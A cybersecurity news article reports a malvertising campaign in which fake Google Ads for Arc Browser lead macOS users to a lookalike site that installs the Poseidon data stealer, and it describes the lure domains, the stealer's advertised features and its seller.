Researchers have discovered a novel campaign distributing a macOS data stealer to unsuspecting users via malicious Google Ads. The new stealer, dubbed Poseidon, being dropped as part of this new campaign, is reportedly being actively developed as a competition to Atomic Stealer — a popular data stealing tool used by cybercriminals with a hefty $3,000 monthly rental fee.
This isn’t the first time Google Ads have been used to drop malware on unsuspecting users, either. According to researchers, it’s the second time in the past couple of months they’ve seen fake ads for Arc Browser being used as a lure. However, the first campaign was used to drop a Windows RAT (Remote Access Tool) instead.
It all starts with an ad for the Arc Browser, which the researchers found belonging to “Coles & Co.” The ad links to the domain name archost.org. Users clicking on the ad are redirected to arc-download.com, a fake site set up to deliver Arc for macOS only. For those who don’t know, Arc Browser is made by The Browser Company, whose official download site is arc.net.
The downloaded DMG file from the bogus website also resembles the one The Browser Company provides to install the real browser. However, it requires users to right-click to open, tricking them into bypassing security protections. Once open, the fake browser connects to the Poseidon project with unfinished code. The researchers even found a hardcoded IP address in the data exfiltration command in the stealer’s source code that points to what appears to be a Poseidon-branded control panel login page.
The threat actor behind Poseidon is known by the handle Rodrigo4. Rodrigo4 also announced the new stealer in a post on the XSS underground forum. The service boasts a malware panel with statistics and a builder with a custom name, icon, and AppleScript. In terms of functionality, the stealer claims to include a file grabber, crypto wallet extractor, password manager stealer, and browser data collector.
This isn’t the first time Google Ads has been exploited to deliver malware. Other malware distribution campaigns have been using Google Ads for a while, including the infamous BumbleBee malware campaign. They all follow more or less the same pattern: the ad impersonates a popular software from a legitimate company but lures users to a fake site, where they end up downloading malware instead.
In the News: Critical MOVEit vulnerability gets exploited hours after disclosure
